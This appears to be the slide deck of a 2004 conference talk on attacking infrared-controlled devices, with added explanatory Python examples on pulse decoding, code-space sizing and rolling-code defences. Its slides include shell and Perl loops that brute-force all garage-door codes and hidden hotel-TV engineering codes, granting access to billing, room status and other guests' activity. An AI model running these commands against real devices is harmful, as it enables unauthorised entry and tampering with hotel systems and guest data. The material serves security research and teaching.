Introduction

■  Why Infra Red?

•  Ubiquitous - still used in modern applications

•  TV / Cable / Sat remotes
   ►  Master configuration / Tuning
   ►  Package selection
   ►  Central control / Billing

•  Vending machines
   ►  Price changes
   ►  On / Off duty

•  Public display signs
   ►  Message programming
   ►  Master configuration

•  Garage door openers

•  Car alarm systems / Central locking

•  Air conditioning

Introduction

■  Why MMIrDA?

•  'Major Malfunction's Infra Red Discovery Application'

•  Built-in IrDA serial port on laptops

•  Originally intended to write a tool for FreeBSD, but found LIRC and other tools already existed under Linux


Introduction

■  Why Bother?

•  IR unlikely to be replaced

•  Fit for use
   ►  Cheap
   ►  Simple
   ►  If it ain't broke, don't fix it!

•  Because it's there!

•  Good skills
   ►  Practice your art
   ►  Know your enemy

•  IR is the ultimate in 'security by obscurity'
   ►  Invisible rays hide a multitude of sins
   ►  Simple codes
   ►  Total control
   ►  Inverted security model


Simple Replay Attacks

■  Record codes and retransmit

•  Early car alarms

•  Garage doors

•  Toys - RoboSapien

•  Standard TVs

•  Bars, clubs etc.

•  Clone 'special' remotes


Cloning / Replay Tools

■  Learning remotes

■  Casio IR watches

■  Apple Newton

■  Omni Remote
   •  PalmOS
   •  Dev library
   ►  http://www.pacificneotek.com/

■  Philips Pronto
   ►  Human readable (Hex)
   ►  http://www.remotecentral.com/
   ►  Pronto tools


Brute Force Attacks

■  Record codes, analyse and infer

•  Garage doors

•  TVs

•  Cars


Brute Force Tools

■  LIRC
   •  http://www.lirc.org/
   •  Visualisation tools
   ►  Auto learning
   ►  ASCII / Human readable config
   ►  Software only with laptop IR port
   ►  Linux only

■  IRTrans
   •  http://www.irtrans.de/
   ►  More powerful transmitter
      -  Solves PC timing issues
      -  Works with more targets
   ►  Serial or USB
   ►  Linux or that other popular O/S


Garage Door Openers

■  Simple code, manually configurable

•  Dipswitch with 8 on / off bits = 256 possible codes

Garage Door Openers

■  Analysing data bits with 'xmode2'

•  Dipswitch 1-7 off, 8 on

   (xmode2 pulse / space plot of the received frame, read as 00000001)


Garage Door Openers

   begin remote
     name        garage
     bits        12
     one         214  558
     zero        214  259
     toggle_bit  0

     begin codes
       00  0x0000000000000000
       01  0x0000000000000001
       80  0x0000000000000080
       e3  0x00000000000000e3
       ff  0x00000000000000ff
     end codes
   end remote
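Added example, not from the talk: a small pulse-width decoder and encoder built on the `one` / `zero` timing pairs of the `garage` config above. It shows what those two lines mean at the signal level (a 214 us mark followed by a 558 us or 259 us space) and why the receiver only has 256 distinct codes to tell apart when eight of the twelve frame bits come from dipswitches. The 25% matching tolerance, the jitter model and the assumption that the four non-switch bits are fixed by the remote are mine, not the slide's, and LIRC's own eps/aeps matching is not reproduced here.

```python
import random  # only used by the constructed jitter model

# Symbol table copied from the "garage" LIRC config: (pulse, space) in microseconds.
ONE = (214, 558)
ZERO = (214, 259)
BITS = 12
TOLERANCE = 0.25   # assumed matching slack per edge; LIRC's eps/aeps handling differs


def _matches(measured, expected, tol=TOLERANCE):
    return abs(measured - expected) <= expected * tol


def decode_frame(timings, bits=BITS):
    """Turn [pulse, space, pulse, space, ...] timings (us) into an integer.

    Bits are read MSB-first, which is how LIRC writes values in `begin codes`.
    Returns None when any mark/space pair fits neither ONE nor ZERO.
    """
    if len(timings) < 2 * bits:
        return None
    value = 0
    for i in range(bits):
        pulse, space = timings[2 * i], timings[2 * i + 1]
        if _matches(pulse, ONE[0]) and _matches(space, ONE[1]):
            bit = 1
        elif _matches(pulse, ZERO[0]) and _matches(space, ZERO[1]):
            bit = 0
        else:
            return None
        value = (value << 1) | bit
    return value


def encode_frame(code, bits=BITS):
    """Ideal timings for `code`; the inverse of decode_frame."""
    if not 0 <= code < (1 << bits):
        raise ValueError("code does not fit in %d bits" % bits)
    timings = []
    for i in range(bits - 1, -1, -1):
        timings.extend(ONE if (code >> i) & 1 else ZERO)
    return timings


def jittered(timings, seed=1):
    """Constructed receiver noise: up to +/-10% per edge, as a real capture has."""
    rng = random.Random(seed)
    return [t + int(t * rng.uniform(-0.10, 0.10)) for t in timings]


def dipswitch_to_code(switches):
    """8 on/off dipswitches -> the 8-bit value they set (switch 1 is the MSB).

    The config declares 12 frame bits, but only 8 are user-settable, which is
    why the slide counts 2**8 = 256 codes (assumption: the other 4 are fixed
    by the remote and carry no user choice).
    """
    if len(switches) != 8:
        raise ValueError("expected 8 switches")
    value = 0
    for on in switches:
        value = (value << 1) | (1 if on else 0)
    return value


if __name__ == "__main__":
    frame = jittered(encode_frame(0x80))
    print("decoded 0x%02x from a jittered frame" % decode_frame(frame))
    print("switches 1-7 off, 8 on ->", dipswitch_to_code([0, 0, 0, 0, 0, 0, 0, 1]))
```

Because ONE and ZERO share the same mark length, all of the information is in the space after it; a frame whose spaces fall between the two tolerance bands (for example a 400 us space) decodes to None rather than to a wrong code, which is the behaviour you want from a receiver that logs malformed frames.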


Garage Door Openers

■  Now fill in the gaps

   perl -e 'for (1..255) { printf("%02x\t\t0x%016x\n", $_, $_) }'

   01  0x0000000000000001
   02  0x0000000000000002
   03  0x0000000000000003
   04  0x0000000000000004
   05  0x0000000000000005
   06  0x0000000000000006
   07  0x0000000000000007
   08  0x0000000000000008
   09  0x0000000000000009
   0a  0x000000000000000a
   0b  0x000000000000000b
   ...

Garage Door Openers

■  Send all possible codes

   for i in `perl -e 'for (0..255) { printf("%02x\n", $_) }'` ; do irsend SEND_ONCE garage $i ; done

   irsend SEND_ONCE garage 00
   irsend SEND_ONCE garage 01
   irsend SEND_ONCE garage 02
   irsend SEND_ONCE garage 03
   irsend SEND_ONCE garage 04
   irsend SEND_ONCE garage 05
   irsend SEND_ONCE garage 06
   irsend SEND_ONCE garage 07
   ...

TV

■  More complex codes (more bits)

•  Manufacturer collision avoidance
   ►  Groups of codes use different bits

•  Multiple device types on single remote
   ►  TV
   ►  Video
   ►  Sat / Cable

•  Code groups
   ►  Standard
      -  Channel select
      -  Menu
      -  Motion
      -  Teletext
   ►  Extra
      -  Alarm clock
      -  Pay TV
      -  Checkout
   ►  Hidden


TV

■  Hidden codes

•  Hotel internal (housekeeping) daily tasks
   ►  Minibar billing
   ►  Room cleaning / status reports

•  Extras (engineering) one-off tasks
   ►  Pay TV config
   ►  Debugging
      -  Cable codes
      -  Signal strength
      -  Port settings
   ►  Accessory / Service / Deactivation

   (Photo of a hotel TV screen showing the German message "Bitte versuchen Sie es später nochmal" - "Please try again later")


TV - Discovering hidden codes

■  Reducing the search space - Standard group

•  14 bit code = 16,384 possible codes

   [REMOTE]
   [NAME]hotel

   [COMMANDS]
   [0][T]0[D]11000000000000
   [1][T]0[D]11000000000001
   [2][T]0[D]11000000000010
   [3][T]0[D]11000000000011
   [4][T]0[D]11000000000100
   [5][T]0[D]11000000000101
   [6][T]0[D]11000000000110
   [7][T]0[D]11000000000111
   [8][T]0[D]11000000001000
   [9][T]0[D]11000000001001

•  Bits used so far:  xx--------xxxx


TV - Discovering hidden codes

■  Reducing the search space - Standard group

   [power][T]0[D]11000000001100
   [mute][T]0[D]11000000001101
   [vol+][T]0[D]11000000010000
   [vol-][T]0[D]11000000010001
   [prog+][T]0[D]11000000100000
   [prog-][T]0[D]11000000100001
   [audio][T]0[D]11000000100011
   [sleep][T]0[D]11000000100110
   [text][T]0[D]11000000111100
   [up][T]0[D]10000000010000
   [down][T]0[D]10000000010001
   [menu][T]0[D]10000000010010
   [left][T]0[D]10000000010101
   [right][T]0[D]10000000010110
   [ok][T]0[D]10000000010111

•  Bits used so far:  xx------xxxxxx


TV - Discovering hidden codes

■  Reducing the search space - Extra group

   [smart][T]0[D]11000011001010
   [paytv+][T]0[D]11000011011100
   [paytv-][T]0[D]11000011011101
   [radio+][T]0[D]11000011011110
   [radio-][T]0[D]11000011011111
   [info+][T]0[D]10000011001101
   [info-][T]0[D]10000011001110
   [message][T]0[D]10000011001010
   [alarmon][T]0[D]10000011101000
   [alarmoff][T]0[D]10000011101001

•  Bits used so far:  xx----xxxxxxxx
   ►  First 2 bits used
   ►  4 bits unknown
   ►  Main code in last 8 bits


TV - Discovering hidden codes

■  Reducing the search space - Eliminate unused bits

•  Toggle single bit on a standard command

   [power][T]0[D]11000000001100   - Original

   [power][T]0[D]01000000001100   ?   - Command succeeds   -x----xxxxxxxx
   [power][T]0[D]10000000001100   ?   - Command fails      -x----xxxxxxxx
   [power][T]0[D]11100000001100   ?   - Command succeeds   -x----xxxxxxxx
   [power][T]0[D]11010000001100   ?   - Command succeeds   -x----xxxxxxxx


TV - Discovering hidden codes

■  Reducing the search space - Eliminate unused bits

•  Toggle single bit on a standard command

   [power][T]0[D]11001000001100   ?   - Command succeeds   -x----xxxxxxxx
   [power][T]0[D]11000100001100   ?   - Command fails      -x---xxxxxxxxx

•  Assumption: bits 1, 3, 4, 5 ignored

•  Search space: bits 2, 5-13 (10 bits) = 1,024 possible codes
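Added example, not part of the talk: the bit-elimination reasoning of the last two slides written out as code, the way a defender would size the real code space of a device. The observations (which single-bit flips of the [power] command still worked) are taken from the slides; `toggle_bit`, `ignored_bits`, `bit_mask` and `effective_code_space` are my names. The point for a risk assessment is the last function: a receiver that masks four of its fourteen bits has a 10-bit code space, so "14-bit code" overstates the protection by a factor of sixteen.

```python
WIDTH = 14  # the hotel TV's code width, from the slides

# From the slides: the [power] command and what happened when it was resent
# with exactly one bit flipped (bit positions are 1-based, left to right).
POWER = "11000000001100"
TOGGLE_RESULTS = {1: "succeeds", 2: "fails", 3: "succeeds", 4: "succeeds",
                  5: "succeeds", 6: "fails"}


def toggle_bit(code, position):
    """Return the bit string `code` with the 1-based bit `position` flipped."""
    if not 1 <= position <= len(code):
        raise ValueError("bit position out of range")
    i = position - 1
    return code[:i] + ("0" if code[i] == "1" else "1") + code[i + 1:]


def ignored_bits(results):
    """Bits the receiver evidently masks: flipping them left the command working."""
    return {pos for pos, outcome in results.items() if outcome == "succeeds"}


def bit_mask(width, ignored):
    """The slides' notation: 'x' = bit is compared by the receiver, '-' = ignored."""
    return "".join("-" if p in ignored else "x" for p in range(1, width + 1))


def effective_code_space(width, results):
    """(significant bits, number of codes the receiver can actually distinguish).

    Every bit not shown to be ignored is counted as significant, untested bits
    included; that is the conservative choice when sizing a device's real code
    space, and it reproduces the slide's 10-bit / 1,024-code figure.
    """
    significant = width - len(ignored_bits(results))
    return significant, 2 ** significant


if __name__ == "__main__":
    ignored = ignored_bits(TOGGLE_RESULTS)
    print("mask:", bit_mask(WIDTH, ignored))
    bits, count = effective_code_space(WIDTH, TOGGLE_RESULTS)
    print("%d significant bits -> %d codes (nominal %d)" % (bits, count, 2 ** WIDTH))
```

The same calculation applies to the garage remote earlier in the deck: a frame width only bounds the code space from above, and the number that matters is the count of bits the receiver actually compares.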


TV - Discovering hidden codes

■  For each lead-in pattern

•  Create config

   perl -e 'for (0..255) { printf("[%03d][T]0[D]100001%s\n", $_, unpack("B8", pack("C", $_))) }' >> hotel.rem
   perl -e 'for (0..255) { printf("[%03d][T]0[D]100010%s\n", $_, unpack("B8", pack("C", $_))) }' >> hotel.rem

   (The pack template is reconstructed from the OCR'd slide: "C" packs the counter as one byte so that "B8" yields its 8 bits.)

•  Manual test / observation

   for i in `perl -e 'for (0..255) { printf("%03d\n", $_) }'` ; do echo -n "$i." ; irtrans localhost hotel $i ; echo "done" ; sleep 2 ; done

•  Rinse, repeat


TV - Discovering hidden codes

■  Profit!

   0000100110000
   0000111011010
   1000100111110
   1000110111110
   1000101111111
   1000101101011
   1000101111010
   1000101111101
   1000111001111
   1000111010110
   0000111010010
   1000111101110

   # engineering
   # engineering
   # engineering
   # disable spoiler signal / computer
   # housekeeping
   # housekeeping
   # engineering
   # bingo! this TV is 0wn3d


TV - New Capabilities

■  Reconfigure TV
   •  Change messages
   •  Assign to another room
   •  Assign new free channels
   •  Find new channels

TV - New Capabilities

■  View back-end systems

   (Screenshot: "TV INSTALLATION" menu)

TV - New Capabilities

■  View other users' activities

   (Screenshot: "TV INSTALLATION" menu)

TV - New Capabilities

■  Change room status
   •  Cleaning
   •  Minibar


TV - Pay per view

■  Movies on demand
   •  Controller requests movie to start & assigns channel
   •  Cyclic or fixed start times
   •  Controller retunes TV
   •  Controller routes selected channel to AV
   •  Controller switches off blocking signal

■  Hollywood movies

■  Adult features
Future Projects

■  Car alarm / Central locking
   •  Moving towards radio
   •  Likely to be carrier technology change only
      ►  LIRC style receiver / transmitter possible

■  Rolling codes
   •  Next code must be within range window
      ►  Hex codes reveal attack range?
   •  Crypto component?
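Added example, not from the talk: a model of the two rolling-code questions the slide raises, "next code must be within range window" and "crypto component?". It is a generic construction of my own, not the scheme of any real keyfob or alarm: the transmitter sends a counter plus an HMAC tag over it, and the receiver accepts only counters inside a window ahead of the last one it honoured. The window size, the key, the 32-bit tag length and all names are assumptions. Replay of a captured frame fails on the window check; a counter guessed inside the window (the "attack range" the slide asks about is visible, since the counter is sent in the clear) fails on the tag check, which is what the crypto component is for.

```python
import hashlib
import hmac

WINDOW = 16  # how far ahead of the last accepted counter a frame may be (assumed)


def _tag(key, counter):
    """Authentication tag over the counter; truncated to 32 bits to keep the
    transmitted 'code' short (assumed design, not a real product's)."""
    return hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()[:4]


class Transmitter:
    def __init__(self, key, counter=0):
        self.key = key
        self.counter = counter

    def press(self):
        """Each press emits a fresh (counter, tag) pair; a counter is never reused."""
        self.counter += 1
        return (self.counter, _tag(self.key, self.counter))


class Receiver:
    def __init__(self, key, window=WINDOW):
        self.key = key
        self.window = window
        self.last = 0  # highest counter accepted so far

    def accept(self, frame):
        counter, tag = frame
        # 1. Window check: the counter must be ahead of the last one honoured,
        #    but not by more than the window (tolerates presses out of range).
        #    A replayed frame fails here because its counter is not > last.
        if not (self.last < counter <= self.last + self.window):
            return False
        # 2. Tag check: knowing the window position does not help without the
        #    key. compare_digest avoids a timing side channel on the compare.
        if not hmac.compare_digest(tag, _tag(self.key, counter)):
            return False
        self.last = counter
        return True


def demo():
    """Constructed scenario; returns which frames the receiver accepted."""
    key = b"constructed-demo-key-not-a-real-secret"
    tx, rx = Transmitter(key), Receiver(key)
    results = {}
    first = tx.press()
    results["fresh"] = rx.accept(first)
    results["replay"] = rx.accept(first)          # captured and resent
    tx.press(); tx.press()                        # two presses out of range
    results["skipped_within_window"] = rx.accept(tx.press())
    for _ in range(WINDOW + 1):                   # too many presses out of range
        tx.press()
    results["beyond_window"] = rx.accept(tx.press())
    # A counter inside the window but without a valid tag.
    results["forged"] = rx.accept((rx.last + 1, b"\x00\x00\x00\x00"))
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print("%-22s %s" % (name, "accepted" if ok else "rejected"))
```

Real rolling-code products differ in detail: they typically run a block cipher over the counter instead of sending it in the clear with a MAC, and they define a resynchronisation procedure for a transmitter that has drifted beyond the window, which this model simply rejects. The structural lesson is the same as on the slide: the window is what stops replay, and the keyed function is what stops anyone who can see the window from producing the next code.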


Questions / Feedback

21C3 Berlin 2004

■  Contact:
   •  majormal@pirate-radio.org

Thank You